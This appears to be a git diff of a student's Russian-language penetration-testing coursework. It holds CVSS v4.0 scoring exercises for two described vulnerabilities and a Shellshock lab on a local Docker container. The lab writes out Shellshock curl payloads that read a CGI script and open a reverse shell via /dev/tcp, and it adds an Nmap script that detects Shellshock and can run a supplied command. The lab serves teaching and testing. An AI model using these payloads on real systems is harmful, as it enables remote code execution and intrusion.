refactored. 01-02-03 done

02-pentest/02-vuln/01-cvss/1.1.md

@@ -0,0 +1,44 @@
+# Модуль 1. Введение в уязвимости
+## Практическое задание №1
+### Задание 1.1
+
+Описание уязвимости:
+```
+В корпоративной сети крупной финансовой организации была обнаружена уязвимость в системе управления конфигурациями серверов. Система управления конфигурациями используется для автоматизации развертывания и поддержания состояния серверов, включая веб-серверы, базы данных и приложения. Уязвимость позволяет злоумышленнику, имеющему доступ к сети, удаленно модифицировать конфигурационные файлы серверов без аутентификации. Это может привести к изменению поведения серверов, внедрению вредоносного кода или даже полному отказу в обслуживании.
+
+Серверы доступны из интернета через брандмауэр и прокси-сервер, но уязвимость в системе управления конфигурациями может быть эксплуатирована только через внутреннюю сеть. Базы данных содержат конфиденциальную информацию клиентов и финансовые данные.
+```
+
+Действовать, проводя оценку, будем из того, что с помощью данной уязвимости можно воздействовать и на саму уязвимую систему.
+
+Для данной уязимости я предлагаю установить следующие метрики
+
+| Metric | Value | Comment |
+| ----- | ----- | ----- |
+|  | **Exploitability Metrics** | |
+| Attack Vector (AV) | Adjacent (A) | Уязвимость в системе управления конфигурациями может быть эксплуатирована только через внутреннюю сеть |
+| Attack Complexity (AC) | Low (L) | Информации о сложности нет, поэтому предполагаем -- низкую сложность |
+| Attack Requirements (AT) | Present (P) | Для проведения атаки необходимо знать архитектуру внутернней сети (какие устройства, за что отвечают) |
+| Privileges Required (PR) | None (N) | Аутентификация не требуется |
+| User Interaction (UI) | None (N) | Взаимодействие с пользователями не требуется |
+| | **Vulnerable System Impact Metrics** | | 
+| Confidentiality (VC) | High (H) | В случае, если система управления конфигурациями может управлять в том числе собой, то согласно тому, что может быть внедрен вредоносный код -- нарушение конфиденциальности является высоким |
+| Integrity (VI) | High (H) | Аналогично VC, целостность может быть нарушена |
+| Availability (VA) | High (H) | Возможен полный отказ в обслуживании |
+| | **Subsequent System Impact Metrics** | |
+| Confidentiality (SC) | High (H) | согласно тому, что может быть внедрен вредоносный код -- нарушение конфиденциальности является высоким |
+| Integrity (SI) | High (H) | Аналогично VC, целостность может быть нарушена |
+| Availability (SA) | High (H) | Возможен полный отказ в обслуживании |
+
+
+### Итог задания 1.1
+
+Вектор CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
+
+Метрика CVSS v4.0 Score: 9.0 / Critical
+
+
+# Итог практического задания
+На этом практическое задание окончено, файл отчет в формате pdf во вложении.
+
+Выполнил: Харитонов Марат Русланович, студенческий билет №М235314.

02-pentest/02-vuln/01-cvss/1.2.md

@@ -0,0 +1,40 @@
+# Модуль 1. Введение в уязвимости
+## Практическое задание №1
+### Задание 1.2
+
+Описание уязвимости: 
+
+```
+В системе мониторинга сетевого трафика, используемой в организации для обеспечения безопасности корпоративной сети, была обнаружена уязвимость. Система мониторинга отвечает за анализ трафика в реальном времени и идентификацию подозрительных действий, таких как попытки вторжения или аномальное поведение. Уязвимость заключается в недостаточной проверке входных данных, что позволяет злоумышленнику отправлять специально сформированные пакеты, вызывающие переполнение буфера и потенциальное выполнение произвольного кода.
+
+Система мониторинга доступна только из внутренней сети и не имеет прямого доступа из интернета, однако эксплуатация уязвимости может привести к обходу сетевых защитных механизмов и дальнейшему распространению атаки внутри корпоративной сети. Базы данных, связанные с системой мониторинга, содержат метаданные о сетевом трафике и не включают конфиденциальную информацию.
+```
+
+Для данной уязимости я предлагаю установить следующие метрики:
+
+| Metric | Value | Comment |
+| ----- | ----- | ----- |
+|  | **Exploitability Metrics** | |
+| Attack Vector (AV) | Adjacent (A) | Система мониторинга доступна только из внутренней сети |
+| Attack Complexity (AC) | Low (L) | Просто отправку модифицированных выполнить можно довольно легко, сложностей нет   |
+| Attack Requirements (AT) | None (N) | Особых требований для проведения атаки нет |
+| Privileges Required (PR) | None (N) | Аутентификация не требуется |
+| User Interaction (UI) | None (N) | Взаимодействие с пользователями не требуется |
+| | **Vulnerable System Impact Metrics** | | 
+| Confidentiality (VC) | High (H) | Потенциальное выполнение произвольного кода означает вероятную потерю конфиденциальности |
+| Integrity (VI) | High (H) | Потенциальное выполнение произвольного кода означает вероятную потерю целостности |
+| Availability (VA) | High (H) | Переполнение буфера обычно сопровождается потерей доступности |
+| | **Subsequent System Impact Metrics** | |
+| Confidentiality (SC) | High (H) | В связи с тем, что возможно распространение атаки с обходом защитных механизмов, конфиденциальность теряется |
+| Integrity (SI) | High (H) | Согласно VC, целостность может быть нарушена |
+| Availability (SA) | High (H) | Возможен полный отказ в обслуживании, согласно VC |
+
+### Итог задания 1.2
+Вектор CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
+
+Метрика CVSS v4.0 Score: 9.4 / Critical
+
+# Итог практического задания
+На этом практическое задание окончено, файл отчет в формате pdf во вложении.
+
+Выполнил: Харитонов Марат Русланович, студенческий билет №М235314.

02-pentest/02-vuln/01-cvss/1.3.md

@@ -0,0 +1,26 @@
+# Модуль 1. Введение в уязвимости
+## Практическое задание №1
+### Задание 1.3
+
+В ходе заданий 1.2 и 1.3 мы получили следующие векторы и показатели критичности уязвимостей:
+
+| Уязвимость | Вектор CVSS:4.0 | Метрика CVSS v4.0 |
+| ----- | ----- | ----- |
+| Уязвимость системы управления конфигурациями | CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H | 9.0 / Critical |
+| Уязвимость системы мониторинга сетевого трафика | CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H | 9.4 / Critical |
+
+Согласно полученным метрикам более критичной можно считать уязвимость системы мониторинга сетевого трафика. Я согласен с тем, что говорят цифры:
+1. Это часть системы защиты информации. Данная уязвимость может привести к отключению других защитных механизмов, что может раскрыть и прочие уязвимости для атакующего.
+2. Уязвимость из задания 1 может быть теоретически полностью митигирована системой защиты информации, а данная -- нет, так как уявзим компонент защиты. 
+3. Уявзимость из задания 1, возможно, не позволяет эксплуатировать её в самой системе управления конфигурациями (нет информации), тогда её конечная метрика будет снижена.
+
+### Итог задания 1.3
+
+Таким образом, в первую очередь необходимо устранить именно вторую уязвимость, так как она ставит под сомнение абсолютно всю систему защиты информации, и её экслуатация может привести к демитигации других уязвимостей. 
+
+Тем не менее, первая уязвимость тоже крайне опасна для любой информационной системы, так что устранив вторую уязвимость, нельзя забывать о первой, в идеале устранять их одновременно.
+
+# Итог практического задания
+На этом практическое задание окончено, файл отчет в формате pdf во вложении.
+
+Выполнил: Харитонов Марат Русланович, студенческий билет №М235314.

02-pentest/02-vuln/01-cvss/README.md

@@ -0,0 +1,98 @@
+# Модуль 1. Введение в уязвимости
+## Практическое задание №1
+### Задание 1.1
+
+Описание уязвимости:
+```
+В корпоративной сети крупной финансовой организации была обнаружена уязвимость в системе управления конфигурациями серверов. Система управления конфигурациями используется для автоматизации развертывания и поддержания состояния серверов, включая веб-серверы, базы данных и приложения. Уязвимость позволяет злоумышленнику, имеющему доступ к сети, удаленно модифицировать конфигурационные файлы серверов без аутентификации. Это может привести к изменению поведения серверов, внедрению вредоносного кода или даже полному отказу в обслуживании.
+
+Серверы доступны из интернета через брандмауэр и прокси-сервер, но уязвимость в системе управления конфигурациями может быть эксплуатирована только через внутреннюю сеть. Базы данных содержат конфиденциальную информацию клиентов и финансовые данные.
+```
+
+Действовать, проводя оценку, будем из того, что с помощью данной уязвимости можно воздействовать и на саму уязвимую систему.
+
+Для данной уязимости я предлагаю установить следующие метрики
+
+| Metric | Value | Comment |
+| ----- | ----- | ----- |
+|  | **Exploitability Metrics** | |
+| Attack Vector (AV) | Adjacent (A) | Уязвимость в системе управления конфигурациями может быть эксплуатирована только через внутреннюю сеть |
+| Attack Complexity (AC) | Low (L) | Информации о сложности нет, поэтому предполагаем -- низкую сложность |
+| Attack Requirements (AT) | Present (P) | Для проведения атаки необходимо знать архитектуру внутернней сети (какие устройства, за что отвечают) |
+| Privileges Required (PR) | None (N) | Аутентификация не требуется |
+| User Interaction (UI) | None (N) | Взаимодействие с пользователями не требуется |
+| | **Vulnerable System Impact Metrics** | | 
+| Confidentiality (VC) | High (H) | В случае, если система управления конфигурациями может управлять в том числе собой, то согласно тому, что может быть внедрен вредоносный код -- нарушение конфиденциальности является высоким |
+| Integrity (VI) | High (H) | Аналогично VC, целостность может быть нарушена |
+| Availability (VA) | High (H) | Возможен полный отказ в обслуживании |
+| | **Subsequent System Impact Metrics** | |
+| Confidentiality (SC) | High (H) | согласно тому, что может быть внедрен вредоносный код -- нарушение конфиденциальности является высоким |
+| Integrity (SI) | High (H) | Аналогично VC, целостность может быть нарушена |
+| Availability (SA) | High (H) | Возможен полный отказ в обслуживании |
+
+
+### Итог задания 1.1
+Вектор CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
+
+Метрика CVSS v4.0 Score: 9.0 / Critical
+
+
+### Задание 1.2
+
+Описание уязвимости: 
+
+```
+В системе мониторинга сетевого трафика, используемой в организации для обеспечения безопасности корпоративной сети, была обнаружена уязвимость. Система мониторинга отвечает за анализ трафика в реальном времени и идентификацию подозрительных действий, таких как попытки вторжения или аномальное поведение. Уязвимость заключается в недостаточной проверке входных данных, что позволяет злоумышленнику отправлять специально сформированные пакеты, вызывающие переполнение буфера и потенциальное выполнение произвольного кода.
+
+Система мониторинга доступна только из внутренней сети и не имеет прямого доступа из интернета, однако эксплуатация уязвимости может привести к обходу сетевых защитных механизмов и дальнейшему распространению атаки внутри корпоративной сети. Базы данных, связанные с системой мониторинга, содержат метаданные о сетевом трафике и не включают конфиденциальную информацию.
+```
+
+Для данной уязимости я предлагаю установить следующие метрики:
+
+| Metric | Value | Comment |
+| ----- | ----- | ----- |
+|  | **Exploitability Metrics** | |
+| Attack Vector (AV) | Adjacent (A) | Система мониторинга доступна только из внутренней сети |
+| Attack Complexity (AC) | Low (L) | Просто отправку модифицированных выполнить можно довольно легко, сложностей нет   |
+| Attack Requirements (AT) | None (N) | Особых требований для проведения атаки нет |
+| Privileges Required (PR) | None (N) | Аутентификация не требуется |
+| User Interaction (UI) | None (N) | Взаимодействие с пользователями не требуется |
+| | **Vulnerable System Impact Metrics** | | 
+| Confidentiality (VC) | High (H) | Потенциальное выполнение произвольного кода означает вероятную потерю конфиденциальности. Несмотря на то, что базы данных, связанные с системой мониторинга не содержат конф. информацию, метрика строится на состоянии самой системы |
+| Integrity (VI) | High (H) | Потенциальное выполнение произвольного кода означает вероятную потерю целостности |
+| Availability (VA) | High (H) | Переполнение буфера обычно сопровождается потерей доступности |
+| | **Subsequent System Impact Metrics** | |
+| Confidentiality (SC) | High (H) | В связи с тем, что возможно распространение атаки с обходом защитных механизмов, конфиденциальность теряется |
+| Integrity (SI) | High (H) | Согласно VC, целостность может быть нарушена |
+| Availability (SA) | High (H) | Возможен полный отказ в обслуживании, согласно VC |
+
+### Итог задания 1.2
+Вектор CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
+
+Метрика CVSS v4.0 Score: 9.4 / Critical
+
+
+### Задание 1.3
+
+В ходе заданий 1.2 и 1.3 мы получили следующие векторы и показатели критичности уязвимостей:
+
+| Уязвимость | Вектор CVSS:4.0 | Метрика CVSS v4.0 |
+| ----- | ----- | ----- |
+| Уязвимость системы управления конфигурациями | CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H | 9.0 / Critical |
+| Уязвимость системы мониторинга сетевого трафика | CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H | 9.4 / Critical |
+
+Согласно полученным метрикам более критичной можно считать уязвимость системы мониторинга сетевого трафика. Я согласен с тем, что говорят цифры:
+1. Это часть системы защиты информации. Данная уязвимость может привести к отключению других защитных механизмов, что может раскрыть и прочие уязвимости для атакующего.
+2. Уязвимость из задания 1 может быть теоретически полностью митигирована системой защиты информации, а данная -- нет, так как уявзим компонент защиты. 
+3. Уявзимость из задания 1, возможно, не позволяет эксплуатировать её в самой системе управления конфигурациями (нет информации), тогда её конечная метрика будет снижена.
+
+### Итог задания 1.3
+
+Таким образом, в первую очередь необходимо устранить именно вторую уязвимость, так как она ставит под сомнение абсолютно всю систему защиты информации, и её экслуатация может привести к демитигации других уязвимостей. 
+
+Тем не менее, первая уязвимость тоже крайне опасна для любой информационной системы, так что устранив вторую уязвимость, нельзя забывать о первой, в идеале устранять их одновременно.
+
+# Итог лабораторной работы
+На этом лабораторная работа окончена, файл отчет в формате pdf во вложении.
+
+Выполнил: Харитонов Марат Русланович, студенческий билет №М235314.

02-pentest/02-vuln/02-openvas/01-shellshock/123

@@ -0,0 +1,20 @@
+/*local http = require "http"
+local stdnse = require "stdnse"
+local shortport = require "shortport"
+local output = stdnse.output_table()
+
+local function check(host, port, url)
+  local payload = "() { :; }; echo; echo VULN"
+  local response = http.get(host, port, url,  { ["header"] = { ["User-Agent"] = payload } })
+  output = response
+  return output
+  return response and response.body and response.body:find("VULN")
+end
+
+portrule = shortport.http
+
+action = function(host, port)
+  local url = stdnse.get_script_args("url")
+  local vulnerable = check(host, port, url)
+  return string.format("Host %s:%s/%s is %s vulnerable to Shellshock", host.ip, port.number, url, vulnerable and "" or " NOT", url)
+end */

02-pentest/02-vuln/02-openvas/01-shellshock/README.md

@@ -0,0 +1,53 @@
+# Модуль 2. Сканирование на уязвимости. Сетевые сканирования
+## Практическое задание №2
+### Задание №1. Детектирование Shellshock с помощью Nmap
+
+1. Скачаем [репозиторий](https://github.com/Zenithar/docker-shellshockable) и соберем Docker-контейнер
+
+![alt text](image.png)
+
+2. Запустим контейнер командой `docker run -d -p 80:80 --name shellshock marker689/shellshockable`
+
+3. Посмотрим вывод CGI-скрипта.
+
+```
+curl http://localhost/cgi-bin/shockme.cgi
+```
+![alt text](image-1.png)
+
+Вывод соответствует коду в CGI-скрипте:
+
+```bash
+#!/usr/local/bin/bash
+echo "Content-type: text/html"
+echo ""
+echo "https://shellshocker.net/"
+```
+
+4. Выполним эксплуатацию уязвимости Shellshock
+
+`curl -A "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /usr/lib/cgi-bin/shockme.cgi" http://localhost/cgi-bin/shockme.cgi`
+
+![alt text](image-2.png)
+
+```bash
+#!/usr/local/bin/bash
+echo "Content-type: text/html"
+echo ""
+echo "https://shellshocker.net/"
+```
+
+Мы раскрыли содержимое скрипта, также можно сделать ревер-шелл.
+
+5. `curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'sh -i >& /dev/tcp/192.168.1.100/1337 0>&1'" http://localhost/cgi-bin/shockme.cgi`
+
+![alt text](image-3.png)
+
+6. Приступим к написанию 
+
+
+
+# Итог лабораторной работы
+На этом лабораторная работа окончена, файл отчет в формате pdf во вложении.
+
+Выполнил: Харитонов Марат Русланович, студенческий билет №М235314.

02-pentest/02-vuln/02-openvas/01-shellshock/shellshock.nse

@@ -0,0 +1,75 @@
+local http = require "http"
+local shortport = require "shortport"
+local stdnse = require "stdnse"
+local string = require "string"
+local vulns = require "vulns"
+local rand = require "rand"
+
+description = [[
+    Check shellshocked
+]]
+
+
+portrule = shortport.http
+
+function generate_http_req(host, port, uri, custom_header, cmd)
+  local rnd = nil
+  --Set custom or probe with random string as cmd
+  if not cmd then
+    local rnd1 = rand.random_alpha(7)
+    local rnd2 = rand.random_alpha(7)
+    rnd = rnd1 .. rnd2
+    cmd = ("echo; echo -n %s; echo %s"):format(rnd1, rnd2)
+  end
+  cmd = "() { :;}; " .. cmd
+  -- Plant the payload in the HTTP headers
+  local options = {header={}}
+  options["no_cache"] = true
+  if custom_header == nil then
+    stdnse.debug1("Sending '%s' in HTTP headers:User-Agent,Cookie and Referer", cmd)
+    options["header"]["User-Agent"] = cmd
+    options["header"]["Referer"] = cmd
+    options["header"]["Cookie"] = cmd
+  else
+    stdnse.debug1("Sending '%s' in HTTP header '%s'", cmd, custom_header)
+    options["header"][custom_header] = cmd
+  end
+  local req = http.get(host, port, uri, options)
+
+  return req, rnd
+end
+
+action = function(host, port)
+  local cmd = stdnse.get_script_args(SCRIPT_NAME..".cmd") or nil
+  local http_header = stdnse.get_script_args(SCRIPT_NAME..".header") or nil
+  local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or '/'
+  local req, rnd = generate_http_req(host, port, uri, http_header, nil)
+  if req.status == 200 and req.body:find(rnd, 1, true) then
+    local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+    local vuln = {
+      title = 'HTTP Shellshock vulnerability',
+      state = vulns.STATE.NOT_VULN,
+      description = [[
+This web application might be affected by the vulnerability known
+as Shellshock. It seems the server is executing commands injected
+via malicious HTTP headers.
+      ]],
+      IDS = {CVE = 'CVE-2014-6271'},
+      references = {
+        'http://www.openwall.com/lists/oss-security/2014/09/24/10',
+        'http://seclists.org/oss-sec/2014/q3/685',
+        'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169'
+      },
+      dates = {
+        disclosure = {year = '2014', month = '09', day = '24'},
+      },
+    }
+    stdnse.debug1("Random pattern '%s' was found in page. Host seems vulnerable.", rnd)
+    vuln.state = vulns.STATE.EXPLOIT
+    if cmd ~= nil then
+       req = generate_http_req(host, port, uri, http_header, cmd)
+       vuln.exploit_results = req.body
+    end
+    return vuln_report:make_output(vuln)
+  end
+end